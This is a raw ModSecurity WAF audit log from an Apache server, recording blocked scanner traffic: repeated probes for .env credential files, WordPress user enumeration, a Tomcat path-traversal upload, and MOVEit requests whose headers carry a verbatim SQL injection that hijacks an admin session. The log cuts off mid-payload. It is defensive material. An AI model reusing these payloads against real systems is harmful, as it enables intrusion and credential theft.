p1=251, p2=0, p3=0, p4=0, p5=36, sr=67, sw=0, l=0, gc=0 Producer: ModSecurity for Apache/2.9.1 (http://www.modsecurity.org/); CWAF_Apache. Server: Apache/2.4.57 (Unix) OpenSSL/1.0.2k-fips Engine-Mode: "ENABLED" --82631c57-Z-- --0265fc35-A-- [05/Jun/2025:00:16:12 +0700] aEB_XNhPZJx8OfNaLCo0BAAAANE 103.236.140.4 40012 103.236.140.4 8181 --0265fc35-B-- GET /.env HTTP/1.0 Host: petruk.hauganslekt.no X-Real-IP: 165.22.34.189 X-Forwarded-Host: petruk.hauganslekt.no X-Forwarded-Server: petruk.hauganslekt.no X-Forwarded-For: 165.22.34.189 X-Forwarded-Proto: https Connection: close User-Agent: Go-http-client/1.1 --0265fc35-F-- HTTP/1.1 403 Forbidden Content-Length: 199 Connection: close Content-Type: text/html; charset=iso-8859-1 --0265fc35-H-- Message: Access denied with code 403 (phase 1). Matched phrase "/.env" at REQUEST_URI. [file "/usr/local/apache/modsecurity-cwaf/rules/02_Global_Generic.conf"] [line "117"] [id "210492"] [rev "3"] [severity "CRITICAL"] [tag "CWAF"] [tag "Generic"] Apache-Error: [file "apache2_util.c"] [line 271] [level 3] [client %s] ModSecurity: %s%s [uri "%s"]%s Action: Intercepted (phase 1) Stopwatch: 1749057372516836 866 (- - -) Stopwatch2: 1749057372516836 866; combined=328, p1=285, p2=0, p3=0, p4=0, p5=43, sr=76, sw=0, l=0, gc=0 Producer: ModSecurity for Apache/2.9.1 (http://www.modsecurity.org/); CWAF_Apache. Server: Apache/2.4.57 (Unix) OpenSSL/1.0.2k-fips Engine-Mode: "ENABLED" --0265fc35-Z-- --600b8a48-A-- [05/Jun/2025:00:57:40 +0700] aECJFNhPZJx8OfNaLCo0WAAAANY 103.236.140.4 40614 103.236.140.4 8181 --600b8a48-B-- GET /.env HTTP/1.1 Host: perpustakaan.smkn22jakarta.sch.id X-Real-IP: 138.68.82.23 X-Forwarded-Host: perpustakaan.smkn22jakarta.sch.id X-Forwarded-Server: perpustakaan.smkn22jakarta.sch.id X-Forwarded-Proto: http User-Agent: Go-http-client/1.1 Cookie: X-Forwarded-For: 138.68.82.23 Accept-Encoding: gzip X-Varnish: 172997943 --600b8a48-F-- HTTP/1.1 403 Forbidden Content-Length: 199 Content-Type: text/html; charset=iso-8859-1 --600b8a48-H-- Message: Access denied with code 403 (phase 1). Matched phrase "/.env" at REQUEST_URI. [file "/usr/local/apache/modsecurity-cwaf/rules/02_Global_Generic.conf"] [line "117"] [id "210492"] [rev "3"] [severity "CRITICAL"] [tag "CWAF"] [tag "Generic"] Apache-Error: [file "apache2_util.c"] [line 271] [level 3] [client %s] ModSecurity: %s%s [uri "%s"]%s Action: Intercepted (phase 1) Stopwatch: 1749059860940374 790 (- - -) Stopwatch2: 1749059860940374 790; combined=341, p1=300, p2=0, p3=0, p4=0, p5=41, sr=81, sw=0, l=0, gc=0 Producer: ModSecurity for Apache/2.9.1 (http://www.modsecurity.org/); CWAF_Apache. Server: Apache/2.4.57 (Unix) OpenSSL/1.0.2k-fips Engine-Mode: "ENABLED" --600b8a48-Z-- --bf04696c-A-- [05/Jun/2025:00:57:50 +0700] aECJHjNXNn6zAsHj7JD1WgAAAFU 103.236.140.4 40666 103.236.140.4 8181 --bf04696c-B-- GET /.env HTTP/1.1 Host: perpustakaan.smkn22jakarta.sch.id X-Real-IP: 138.197.191.87 X-Forwarded-Host: perpustakaan.smkn22jakarta.sch.id X-Forwarded-Server: perpustakaan.smkn22jakarta.sch.id X-Forwarded-Proto: https User-Agent: Go-http-client/1.1 Cookie: X-Forwarded-For: 138.197.191.87 Accept-Encoding: gzip X-Varnish: 172997966 --bf04696c-F-- HTTP/1.1 403 Forbidden Content-Length: 199 Content-Type: text/html; charset=iso-8859-1 --bf04696c-H-- Message: Access denied with code 403 (phase 1). Matched phrase "/.env" at REQUEST_URI. [file "/usr/local/apache/modsecurity-cwaf/rules/02_Global_Generic.conf"] [line "117"] [id "210492"] [rev "3"] [severity "CRITICAL"] [tag "CWAF"] [tag "Generic"] Apache-Error: [file "apache2_util.c"] [line 271] [level 3] [client %s] ModSecurity: %s%s [uri "%s"]%s Action: Intercepted (phase 1) Stopwatch: 1749059870208491 713 (- - -) Stopwatch2: 1749059870208491 713; combined=321, p1=283, p2=0, p3=0, p4=0, p5=37, sr=76, sw=1, l=0, gc=0 Producer: ModSecurity for Apache/2.9.1 (http://www.modsecurity.org/); CWAF_Apache. Server: Apache/2.4.57 (Unix) OpenSSL/1.0.2k-fips Engine-Mode: "ENABLED" --bf04696c-Z-- --0456cf36-A-- [05/Jun/2025:02:02:13 +0700] aECYNdhPZJx8OfNaLCo0pAAAAMo 103.236.140.4 41410 103.236.140.4 8181 --0456cf36-B-- GET /.env HTTP/1.0 Host: 103.236.140.4 X-Real-IP: 164.92.253.3 X-Forwarded-Host: 103.236.140.4 X-Forwarded-Server: 103.236.140.4 X-Forwarded-For: 164.92.253.3 X-Forwarded-Proto: https Connection: close User-Agent: Mozilla/5.0 (Linux; Android 8.0.0; SAMSUNG-SM-G891A) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/76.0.3809.111 Mobile Safari/537.36 Accept-Charset: utf-8 --0456cf36-F-- HTTP/1.1 403 Forbidden Content-Length: 199 Connection: close Content-Type: text/html; charset=iso-8859-1 --0456cf36-H-- Message: Access denied with code 403 (phase 1). Matched phrase "/.env" at REQUEST_URI. [file "/usr/local/apache/modsecurity-cwaf/rules/02_Global_Generic.conf"] [line "117"] [id "210492"] [rev "3"] [severity "CRITICAL"] [tag "CWAF"] [tag "Generic"] Apache-Error: [file "apache2_util.c"] [line 271] [level 3] [client %s] ModSecurity: %s%s [uri "%s"]%s Action: Intercepted (phase 1) Stopwatch: 1749063733843011 871 (- - -) Stopwatch2: 1749063733843011 871; combined=371, p1=330, p2=0, p3=0, p4=0, p5=41, sr=106, sw=0, l=0, gc=0 Producer: ModSecurity for Apache/2.9.1 (http://www.modsecurity.org/); CWAF_Apache. Server: Apache/2.4.57 (Unix) OpenSSL/1.0.2k-fips Engine-Mode: "ENABLED" --0456cf36-Z-- --f313e21e-A-- [05/Jun/2025:02:23:55 +0700] aECdS1_DvM40jZomoktimgAAAAM 103.236.140.4 41580 103.236.140.4 8181 --f313e21e-B-- GET /.env HTTP/1.0 Host: 103.236.140.4 X-Real-IP: 196.251.87.59 X-Forwarded-Host: 103.236.140.4 X-Forwarded-Server: 103.236.140.4 X-Forwarded-For: 196.251.87.59 X-Forwarded-Proto: https Connection: close User-Agent: Mozilla/5.0 (Linux; Android 9; Redmi Note 5) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/72.0.3626.121 Mobile Safari/537.36 Accept-Charset: utf-8 --f313e21e-F-- HTTP/1.1 403 Forbidden Content-Length: 199 Connection: close Content-Type: text/html; charset=iso-8859-1 --f313e21e-H-- Message: Access denied with code 403 (phase 1). Matched phrase "/.env" at REQUEST_URI. [file "/usr/local/apache/modsecurity-cwaf/rules/02_Global_Generic.conf"] [line "117"] [id "210492"] [rev "3"] [severity "CRITICAL"] [tag "CWAF"] [tag "Generic"] Apache-Error: [file "apache2_util.c"] [line 271] [level 3] [client %s] ModSecurity: %s%s [uri "%s"]%s Action: Intercepted (phase 1) Stopwatch: 1749065035411966 859 (- - -) Stopwatch2: 1749065035411966 859; combined=346, p1=307, p2=0, p3=0, p4=0, p5=39, sr=95, sw=0, l=0, gc=0 Producer: ModSecurity for Apache/2.9.1 (http://www.modsecurity.org/); CWAF_Apache. Server: Apache/2.4.57 (Unix) OpenSSL/1.0.2k-fips Engine-Mode: "ENABLED" --f313e21e-Z-- --22aa7c61-A-- [05/Jun/2025:02:56:10 +0700] aECk2l_DvM40jZomoktiuQAAAAE 103.236.140.4 41774 103.236.140.4 8181 --22aa7c61-B-- GET /.env HTTP/1.0 Host: 103.236.140.4 X-Real-IP: 196.251.73.96 X-Forwarded-Host: 103.236.140.4 X-Forwarded-Server: 103.236.140.4 X-Forwarded-For: 196.251.73.96 X-Forwarded-Proto: https Connection: close User-Agent: Jigsaw/2.2.5 W3C_CSS_Validator_JFouffa/2.0 Accept-Charset: utf-8 --22aa7c61-F-- HTTP/1.1 403 Forbidden Content-Length: 199 Connection: close Content-Type: text/html; charset=iso-8859-1 --22aa7c61-H-- Message: Access denied with code 403 (phase 1). Matched phrase "/.env" at REQUEST_URI. [file "/usr/local/apache/modsecurity-cwaf/rules/02_Global_Generic.conf"] [line "117"] [id "210492"] [rev "3"] [severity "CRITICAL"] [tag "CWAF"] [tag "Generic"] Apache-Error: [file "apache2_util.c"] [line 271] [level 3] [client %s] ModSecurity: %s%s [uri "%s"]%s Action: Intercepted (phase 1) Stopwatch: 1749066970049061 836 (- - -) Stopwatch2: 1749066970049061 836; combined=345, p1=305, p2=0, p3=0, p4=0, p5=40, sr=82, sw=0, l=0, gc=0 Producer: ModSecurity for Apache/2.9.1 (http://www.modsecurity.org/); CWAF_Apache. Server: Apache/2.4.57 (Unix) OpenSSL/1.0.2k-fips Engine-Mode: "ENABLED" --22aa7c61-Z-- --7f9b2f65-A-- [05/Jun/2025:03:04:50 +0700] aECm4l_DvM40jZomoktixgAAAAM 103.236.140.4 41880 103.236.140.4 8181 --7f9b2f65-B-- GET /.env HTTP/1.0 Host: mignere.twilightparadox.com X-Real-IP: 167.99.210.137 X-Forwarded-Host: mignere.twilightparadox.com X-Forwarded-Server: mignere.twilightparadox.com X-Forwarded-For: 167.99.210.137 X-Forwarded-Proto: https Connection: close User-Agent: Go-http-client/1.1 --7f9b2f65-F-- HTTP/1.1 403 Forbidden Content-Length: 199 Connection: close Content-Type: text/html; charset=iso-8859-1 --7f9b2f65-H-- Message: Access denied with code 403 (phase 1). Matched phrase "/.env" at REQUEST_URI. [file "/usr/local/apache/modsecurity-cwaf/rules/02_Global_Generic.conf"] [line "117"] [id "210492"] [rev "3"] [severity "CRITICAL"] [tag "CWAF"] [tag "Generic"] Apache-Error: [file "apache2_util.c"] [line 271] [level 3] [client %s] ModSecurity: %s%s [uri "%s"]%s Action: Intercepted (phase 1) Stopwatch: 1749067490032734 811 (- - -) Stopwatch2: 1749067490032734 811; combined=292, p1=266, p2=0, p3=0, p4=0, p5=26, sr=73, sw=0, l=0, gc=0 Producer: ModSecurity for Apache/2.9.1 (http://www.modsecurity.org/); CWAF_Apache. Server: Apache/2.4.57 (Unix) OpenSSL/1.0.2k-fips Engine-Mode: "ENABLED" --7f9b2f65-Z-- --2d5e5131-A-- [05/Jun/2025:03:33:36 +0700] aECtoFwdJdhOudw5hdzIfQAAAIA 103.236.140.4 42170 103.236.140.4 8181 --2d5e5131-B-- GET /.env HTTP/1.0 Host: 103.236.140.4 X-Real-IP: 196.251.87.59 X-Forwarded-Host: 103.236.140.4 X-Forwarded-Server: 103.236.140.4 X-Forwarded-For: 196.251.87.59 X-Forwarded-Proto: https Connection: close User-Agent: Mozilla/5.0 (Linux; Android 8.1.0; LM-Q925S) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/76.0.3809.111 Mobile Safari/537.36 Accept-Charset: utf-8 --2d5e5131-F-- HTTP/1.1 403 Forbidden Content-Length: 199 Connection: close Content-Type: text/html; charset=iso-8859-1 --2d5e5131-H-- Message: Access denied with code 403 (phase 1). Matched phrase "/.env" at REQUEST_URI. [file "/usr/local/apache/modsecurity-cwaf/rules/02_Global_Generic.conf"] [line "117"] [id "210492"] [rev "3"] [severity "CRITICAL"] [tag "CWAF"] [tag "Generic"] Apache-Error: [file "apache2_util.c"] [line 271] [level 3] [client %s] ModSecurity: %s%s [uri "%s"]%s Action: Intercepted (phase 1) Stopwatch: 1749069216842000 668 (- - -) Stopwatch2: 1749069216842000 668; combined=232, p1=205, p2=0, p3=0, p4=0, p5=26, sr=52, sw=1, l=0, gc=0 Producer: ModSecurity for Apache/2.9.1 (http://www.modsecurity.org/); CWAF_Apache. Server: Apache/2.4.57 (Unix) OpenSSL/1.0.2k-fips Engine-Mode: "ENABLED" --2d5e5131-Z-- --73712259-A-- [05/Jun/2025:03:37:52 +0700] aECuoCrHpfaS2Cuwh8XOJAAAAFE 103.236.140.4 42176 103.236.140.4 8181 --73712259-B-- GET /.env HTTP/1.0 Host: 103.236.140.4 X-Real-IP: 196.251.87.59 X-Forwarded-Host: 103.236.140.4 X-Forwarded-Server: 103.236.140.4 X-Forwarded-For: 196.251.87.59 X-Forwarded-Proto: https Connection: close User-Agent: Mozilla/5.0 (Windows NT 6.3; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/65.0.3325.162 Safari/537.36 Accept-Charset: utf-8 --73712259-F-- HTTP/1.1 403 Forbidden Content-Length: 199 Connection: close Content-Type: text/html; charset=iso-8859-1 --73712259-H-- Message: Access denied with code 403 (phase 1). Matched phrase "/.env" at REQUEST_URI. [file "/usr/local/apache/modsecurity-cwaf/rules/02_Global_Generic.conf"] [line "117"] [id "210492"] [rev "3"] [severity "CRITICAL"] [tag "CWAF"] [tag "Generic"] Apache-Error: [file "apache2_util.c"] [line 271] [level 3] [client %s] ModSecurity: %s%s [uri "%s"]%s Action: Intercepted (phase 1) Stopwatch: 1749069472077277 906 (- - -) Stopwatch2: 1749069472077277 906; combined=372, p1=331, p2=0, p3=0, p4=0, p5=41, sr=117, sw=0, l=0, gc=0 Producer: ModSecurity for Apache/2.9.1 (http://www.modsecurity.org/); CWAF_Apache. Server: Apache/2.4.57 (Unix) OpenSSL/1.0.2k-fips Engine-Mode: "ENABLED" --73712259-Z-- --0a855648-A-- [05/Jun/2025:04:18:49 +0700] aEC4Oeth7G2xELALzPYZ8AAAANU 103.236.140.4 42404 103.236.140.4 8181 --0a855648-B-- GET /.env HTTP/1.0 Host: 103.236.140.4 X-Real-IP: 164.92.176.55 X-Forwarded-Host: 103.236.140.4 X-Forwarded-Server: 103.236.140.4 X-Forwarded-For: 164.92.176.55 X-Forwarded-Proto: http Connection: close User-Agent: Mozilla/5.0; Keydrop.io/1.0(onlyscans.com/about); Accept: */* --0a855648-F-- HTTP/1.1 403 Forbidden Content-Length: 199 Connection: close Content-Type: text/html; charset=iso-8859-1 --0a855648-H-- Message: Access denied with code 403 (phase 1). Matched phrase "/.env" at REQUEST_URI. [file "/usr/local/apache/modsecurity-cwaf/rules/02_Global_Generic.conf"] [line "117"] [id "210492"] [rev "3"] [severity "CRITICAL"] [tag "CWAF"] [tag "Generic"] Apache-Error: [file "apache2_util.c"] [line 271] [level 3] [client %s] ModSecurity: %s%s [uri "%s"]%s Action: Intercepted (phase 1) Stopwatch: 1749071929662659 692 (- - -) Stopwatch2: 1749071929662659 692; combined=289, p1=257, p2=0, p3=0, p4=0, p5=32, sr=93, sw=0, l=0, gc=0 Producer: ModSecurity for Apache/2.9.1 (http://www.modsecurity.org/); CWAF_Apache. Server: Apache/2.4.57 (Unix) OpenSSL/1.0.2k-fips Engine-Mode: "ENABLED" --0a855648-Z-- --d5255956-A-- [05/Jun/2025:04:46:33 +0700] aEC-uSrHpfaS2Cuwh8XOZAAAAEM 103.236.140.4 42602 103.236.140.4 8181 --d5255956-B-- GET /.env HTTP/1.0 Host: wooin.epicgamer.org X-Real-IP: 143.244.168.161 X-Forwarded-Host: wooin.epicgamer.org X-Forwarded-Server: wooin.epicgamer.org X-Forwarded-For: 143.244.168.161 X-Forwarded-Proto: http Connection: close User-Agent: Go-http-client/1.1 --d5255956-F-- HTTP/1.1 403 Forbidden Content-Length: 199 Connection: close Content-Type: text/html; charset=iso-8859-1 --d5255956-H-- Message: Access denied with code 403 (phase 1). Matched phrase "/.env" at REQUEST_URI. [file "/usr/local/apache/modsecurity-cwaf/rules/02_Global_Generic.conf"] [line "117"] [id "210492"] [rev "3"] [severity "CRITICAL"] [tag "CWAF"] [tag "Generic"] Apache-Error: [file "apache2_util.c"] [line 271] [level 3] [client %s] ModSecurity: %s%s [uri "%s"]%s Action: Intercepted (phase 1) Stopwatch: 1749073593773125 783 (- - -) Stopwatch2: 1749073593773125 783; combined=346, p1=312, p2=0, p3=0, p4=0, p5=34, sr=119, sw=0, l=0, gc=0 Producer: ModSecurity for Apache/2.9.1 (http://www.modsecurity.org/); CWAF_Apache. Server: Apache/2.4.57 (Unix) OpenSSL/1.0.2k-fips Engine-Mode: "ENABLED" --d5255956-Z-- --6f6d705d-A-- [05/Jun/2025:07:05:48 +0700] aEDfXOth7G2xELALzPYaywAAAME 103.236.140.4 44958 103.236.140.4 8181 --6f6d705d-B-- GET /.env.save HTTP/1.0 Host: 103.236.140.4 X-Real-IP: 198.55.98.76 X-Forwarded-Host: 103.236.140.4 X-Forwarded-Server: 103.236.140.4 X-Forwarded-For: 198.55.98.76 X-Forwarded-Proto: https Connection: close User-Agent: Mozilla/5.0 (Linux; Android 9; JSN-AL00a Build/HONORJSN-AL00a; wv) AppleWebKit/537.36 (KHTML, like Gecko) Version/4.0 Chrome/66.0.3359.126 MQQBrowser/6.2 TBS/044807 Mobile Safari/537.36 MMWEBID/1961 MicroMessenger/7.0.6.1460(0x27000634) Process/tools NetType/WIFI Language/zh_CN Accept-Charset: utf-8 --6f6d705d-F-- HTTP/1.1 403 Forbidden Content-Length: 199 Connection: close Content-Type: text/html; charset=iso-8859-1 --6f6d705d-H-- Message: Access denied with code 403 (phase 1). Matched phrase "/.env" at REQUEST_URI. [file "/usr/local/apache/modsecurity-cwaf/rules/02_Global_Generic.conf"] [line "117"] [id "210492"] [rev "3"] [severity "CRITICAL"] [tag "CWAF"] [tag "Generic"] Apache-Error: [file "apache2_util.c"] [line 271] [level 3] [client %s] ModSecurity: %s%s [uri "%s"]%s Action: Intercepted (phase 1) Stopwatch: 1749081948877233 932 (- - -) Stopwatch2: 1749081948877233 932; combined=408, p1=368, p2=0, p3=0, p4=0, p5=39, sr=153, sw=1, l=0, gc=0 Producer: ModSecurity for Apache/2.9.1 (http://www.modsecurity.org/); CWAF_Apache. Server: Apache/2.4.57 (Unix) OpenSSL/1.0.2k-fips Engine-Mode: "ENABLED" --6f6d705d-Z-- --cd0e6076-A-- [05/Jun/2025:07:12:09 +0700] aEDg2eth7G2xELALzPYa0AAAAMs 103.236.140.4 44982 103.236.140.4 8181 --cd0e6076-B-- GET /shop/.env HTTP/1.0 Host: 103.236.140.4 X-Real-IP: 196.251.85.66 X-Forwarded-Host: 103.236.140.4 X-Forwarded-Server: 103.236.140.4 X-Forwarded-For: 196.251.85.66 X-Forwarded-Proto: https Connection: close User-Agent: Mozilla/5.0 (Macintosh; Intel Mac OS X 10_13_6) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/75.0.3770.100 Safari/537.36 Accept-Charset: utf-8 --cd0e6076-F-- HTTP/1.1 403 Forbidden Content-Length: 199 Connection: close Content-Type: text/html; charset=iso-8859-1 --cd0e6076-H-- Message: Access denied with code 403 (phase 1). Matched phrase "/.env" at REQUEST_URI. [file "/usr/local/apache/modsecurity-cwaf/rules/02_Global_Generic.conf"] [line "117"] [id "210492"] [rev "3"] [severity "CRITICAL"] [tag "CWAF"] [tag "Generic"] Apache-Error: [file "apache2_util.c"] [line 271] [level 3] [client %s] ModSecurity: %s%s [uri "%s"]%s Action: Intercepted (phase 1) Stopwatch: 1749082329910498 784 (- - -) Stopwatch2: 1749082329910498 784; combined=324, p1=283, p2=0, p3=0, p4=0, p5=41, sr=74, sw=0, l=0, gc=0 Producer: ModSecurity for Apache/2.9.1 (http://www.modsecurity.org/); CWAF_Apache. Server: Apache/2.4.57 (Unix) OpenSSL/1.0.2k-fips Engine-Mode: "ENABLED" --cd0e6076-Z-- --317c0b16-A-- [05/Jun/2025:07:24:06 +0700] aEDjpirHpfaS2Cuwh8XPBgAAAFM 103.236.140.4 45060 103.236.140.4 8181 --317c0b16-B-- GET /wp-json/wp/v2/users/ HTTP/1.0 Host: smkn22-jkt.sch.id X-Real-IP: 45.90.185.109 X-Forwarded-Host: smkn22-jkt.sch.id X-Forwarded-Server: smkn22-jkt.sch.id X-Forwarded-For: 45.90.185.109 X-Forwarded-Proto: https Connection: close Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/avif,image/webp,image/apng,*/*;q=0.8 Accept-Language: en-US,en;q=0.9 User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) --317c0b16-F-- HTTP/1.1 403 Forbidden Content-Length: 199 Connection: close Content-Type: text/html; charset=iso-8859-1 --317c0b16-H-- Message: Access denied with code 403 (phase 2). Operator EQ matched 0 at REQUEST_COOKIES_NAMES. [file "/usr/local/apache/modsecurity-cwaf/rules/26_Apps_WordPress.conf"] [line "155"] [id "225170"] [rev "3"] [msg "COMODO WAF: Sensitive Information Disclosure Vulnerability in WordPress 4.7 (CVE-2017-5487)||smkn22-jkt.sch.id|F|2"] [severity "CRITICAL"] [tag "CWAF"] [tag "WordPress"] Apache-Error: [file "apache2_util.c"] [line 271] [level 3] [client %s] ModSecurity: %s%s [uri "%s"]%s Action: Intercepted (phase 2) Stopwatch: 1749083046018937 3129 (- - -) Stopwatch2: 1749083046018937 3129; combined=1359, p1=512, p2=817, p3=0, p4=0, p5=29, sr=147, sw=1, l=0, gc=0 Producer: ModSecurity for Apache/2.9.1 (http://www.modsecurity.org/); CWAF_Apache. Server: Apache/2.4.57 (Unix) OpenSSL/1.0.2k-fips Engine-Mode: "ENABLED" --317c0b16-Z-- --d7c69e39-A-- [05/Jun/2025:08:38:06 +0700] aED0_irHpfaS2Cuwh8XQUAAAAEc 103.236.140.4 49704 103.236.140.4 8181 --d7c69e39-B-- POST /userentry?accountId=/../../../tomcat/webapps/Zm79I/&symbolName=test&base64UserName=YWRtaW4= HTTP/1.0 Host: perpustakaan.smkn22jakarta.sch.id X-Real-IP: 206.82.6.62 X-Forwarded-Host: perpustakaan.smkn22jakarta.sch.id X-Forwarded-Server: perpustakaan.smkn22jakarta.sch.id X-Forwarded-Proto: http Content-Length: 124 User-Agent: Mozilla/5.0 (Macintosh; Intel Mac OS X 10_15_7) AppleWebKit/605.1.15 (KHTML, like Gecko) Version/16.5.1 Safari/605.1.15 Content-Type: application/x-www-form-urlencoded X-Forwarded-For: 206.82.6.62 Cookie: X-Varnish: 173802494 --d7c69e39-C-- xœ ðffábœŠ¼ð"AQN „…dœÃ\u ŒŒuMÌLÌôJ*JBC8˜Û§žcóK-­àf`dùÊÈÀÀ2¨:>Ä58„+À›‘IŽ—±`q &†-Pm–°B,A³ À›• ¢—‘!H‡‚M ?Ë --d7c69e39-F-- HTTP/1.1 403 Forbidden X-Frame-Options: SAMEORIGIN Content-Length: 199 Connection: close Content-Type: text/html; charset=iso-8859-1 --d7c69e39-E-- --d7c69e39-H-- Message: Access denied with code 403 (phase 2). Found 1 byte(s) in ARGS_NAMES:x\x9c\v\xf0ff\xe1b\x00\x81\x9c\x8a\xbc\xf0"AQ\x0fN \x1b\x84\x85\x18d\x18\x9c\xc3\\u\x8d\x0c\x8c\x8cuM\xcc\x8dL\xcc\xf4J*JBC8\x19\x98\x1f\xdb\x05\xa7\x9ec\xf3K-\xad\xe0f`d\xf9\xca\xc8\xc0\xc0\x022\x01\xa8:>\xc458\x84 \xc0\x9b\x91I\x8e\x19\x97\xb1\x12`q\xa0 outside range: 1-255. [file "/usr/local/apache/modsecurity-cwaf/rules/12_HTTP_Protocol.conf"] [line "95"] [id "210410"] [rev "4"] [msg "COMODO WAF: Invalid character in request||perpustakaan.smkn22jakarta.sch.id|F|3"] [data "ARGS_NAMES:x\x5cx9c\x5cv\x5cxf0ff\x5cxe1b\x5cx00\x5cx81\x5cx9c\x5cx8a\x5cxbc\x5cxf0\x22AQ\x5cx0fN \x5cx1b\x5cx84\x5cx85\x5cx18d\x5cx18\x5cx9c\x5cxc3\x5c\x5cu\x5cx8d\x5cx0c\x5cx8c\x5cx8cuM\x5cxcc\x5cx8dL\x5cxcc\x5cxf4J*JBC8\x5cx19\x5cx98\x5cx1f\x5cxdb\x5cx05\x5cxa7\x5cx9ec\x5cxf3K-\x5cxad\x5cxe0f`d\x5cxf9\x5cxca\x5cxc8\x5cxc0\x5cxc0\x5cx022\x5cx01\x5cxa8:>\x5cxc458\x5cx84 \x5cxc0\x5cx9b\x5cx91I\x5cx8e\x5cx19\x5cx97\x5cxb1\x5cx12`q\x5cxa0=x\x9c\x0b\xf0ff\xe1b\x00\x81\x9c Apache-Error: [file "apache2_util.c"] [line 271] [level 3] [client %s] ModSecurity: %s%s [uri "%s"]%s Action: Intercepted (phase 2) Stopwatch: 1749087486680449 4638 (- - -) Stopwatch2: 1749087486680449 4638; combined=2653, p1=510, p2=2109, p3=0, p4=0, p5=34, sr=74, sw=0, l=0, gc=0 Response-Body-Transformed: Dechunked Producer: ModSecurity for Apache/2.9.1 (http://www.modsecurity.org/); CWAF_Apache. Server: Apache/2.4.57 (Unix) OpenSSL/1.0.2k-fips Engine-Mode: "ENABLED" --d7c69e39-Z-- --10c14874-A-- [05/Jun/2025:09:39:40 +0700] aEEDbOth7G2xELALzPYfZAAAANQ 103.236.140.4 59406 103.236.140.4 8181 --10c14874-B-- GET /.env HTTP/1.0 Host: 103.236.140.4 X-Real-IP: 164.92.176.55 X-Forwarded-Host: 103.236.140.4 X-Forwarded-Server: 103.236.140.4 X-Forwarded-For: 164.92.176.55 X-Forwarded-Proto: https Connection: close User-Agent: Mozilla/5.0; Keydrop.io/1.0(onlyscans.com/about); Accept: */* --10c14874-F-- HTTP/1.1 403 Forbidden Content-Length: 199 Connection: close Content-Type: text/html; charset=iso-8859-1 --10c14874-H-- Message: Access denied with code 403 (phase 1). Matched phrase "/.env" at REQUEST_URI. [file "/usr/local/apache/modsecurity-cwaf/rules/02_Global_Generic.conf"] [line "117"] [id "210492"] [rev "3"] [severity "CRITICAL"] [tag "CWAF"] [tag "Generic"] Apache-Error: [file "apache2_util.c"] [line 271] [level 3] [client %s] ModSecurity: %s%s [uri "%s"]%s Action: Intercepted (phase 1) Stopwatch: 1749091180426862 778 (- - -) Stopwatch2: 1749091180426862 778; combined=315, p1=277, p2=0, p3=0, p4=0, p5=38, sr=72, sw=0, l=0, gc=0 Producer: ModSecurity for Apache/2.9.1 (http://www.modsecurity.org/); CWAF_Apache. Server: Apache/2.4.57 (Unix) OpenSSL/1.0.2k-fips Engine-Mode: "ENABLED" --10c14874-Z-- --256f7b69-A-- [05/Jun/2025:10:00:20 +0700] aEEIRFwdJdhOudw5hdzN5AAAAIY 103.236.140.4 32778 103.236.140.4 8181 --256f7b69-B-- POST /moveitisapi/moveitisapi.dll?action=m2 HTTP/1.0 Host: perpustakaan.smkn22jakarta.sch.id X-Real-IP: 206.82.6.62 X-Forwarded-Host: perpustakaan.smkn22jakarta.sch.id X-Forwarded-Server: perpustakaan.smkn22jakarta.sch.id X-Forwarded-Proto: http Content-Length: 0 User-Agent: Mozilla/5.0 (X11; Linux x86_64; rv:109.0) Gecko/20100101 Firefox/118.0 Ax-silock-transaction: folder_add_by_path X-siLock-SessVar0: MyUsername: Guest X-siLock-SessVar1: MyPkgAccessCode: 123 X-siLock-SessVar2: MyGuestEmailAddr: my_guest_email@example.com X-siLock-Transaction: session_setvars X-Forwarded-For: 206.82.6.62 Cookie: siLockLongTermInstID=0; SenayanMember=hoq0cmn7l5ork6n0pe0ltt5ej0 X-Varnish: 173658387 --256f7b69-C-- --256f7b69-F-- HTTP/1.1 403 Forbidden X-Frame-Options: SAMEORIGIN Content-Length: 199 Connection: close Content-Type: text/html; charset=iso-8859-1 --256f7b69-E-- --256f7b69-H-- Message: Access denied with code 403 (phase 2). Match of "pmFromFile userdata_wl_extensions" against "TX:extension" required. [file "/usr/local/apache/modsecurity-cwaf/rules/10_HTTP_HTTP.conf"] [line "27"] [id "210730"] [rev "5"] [msg "COMODO WAF: URL file extension is restricted by policy||perpustakaan.smkn22jakarta.sch.id|F|2"] [data ".dll"] [severity "CRITICAL"] [tag "CWAF"] [tag "HTTP"] Apache-Error: [file "apache2_util.c"] [line 271] [level 3] [client %s] ModSecurity: %s%s [uri "%s"]%s Action: Intercepted (phase 2) Stopwatch: 1749092420690890 3259 (- - -) Stopwatch2: 1749092420690890 3259; combined=1538, p1=456, p2=1052, p3=0, p4=0, p5=30, sr=92, sw=0, l=0, gc=0 Response-Body-Transformed: Dechunked Producer: ModSecurity for Apache/2.9.1 (http://www.modsecurity.org/); CWAF_Apache. Server: Apache/2.4.57 (Unix) OpenSSL/1.0.2k-fips Engine-Mode: "ENABLED" --256f7b69-Z-- --68aad30c-A-- [05/Jun/2025:10:00:32 +0700] aEEIUCrHpfaS2Cuwh8XTbwAAAFI 103.236.140.4 32794 103.236.140.4 8181 --68aad30c-B-- POST /moveitisapi/moveitisapi.dll?action=m2 HTTP/1.0 Host: perpustakaan.smkn22jakarta.sch.id X-Real-IP: 206.82.6.62 X-Forwarded-Host: perpustakaan.smkn22jakarta.sch.id X-Forwarded-Server: perpustakaan.smkn22jakarta.sch.id X-Forwarded-Proto: http Content-Length: 0 User-Agent: python-requests/2.26.0 Accept: */* Ax-silock-transaction: folder_add_by_path X-siLock-SessVar0: MyPkgID: 0 X-siLock-SessVar1: MyPkgSelfProvisionedRecips: SQL Injection'); INSERT INTO activesessions (SessionID) values ('2xxRNEzNwXI0bzeiwv5DSRNFYJz');UPDATE activesessions SET Username=(select Username from users order by permission desc limit 1) WHERE SessionID='2xxRNEzNwXI0bzeiwv5DSRNFYJz';UPDATE activesessions SET LoginName='test@test.com' WHERE SessionID='2xxRNEzNwXI0bzeiwv5DSRNFYJz';UPDATE activesessions SET RealName='test@test.com' WHERE SessionID='2xxRNEzNwXI0bzeiwv5DSRNFYJz';UPDATE activesessions SET InstId='1234' WHERE SessionID='2xxRNEzNwXI0bzeiwv5DSRNFYJz';UPDATE activesessions SET 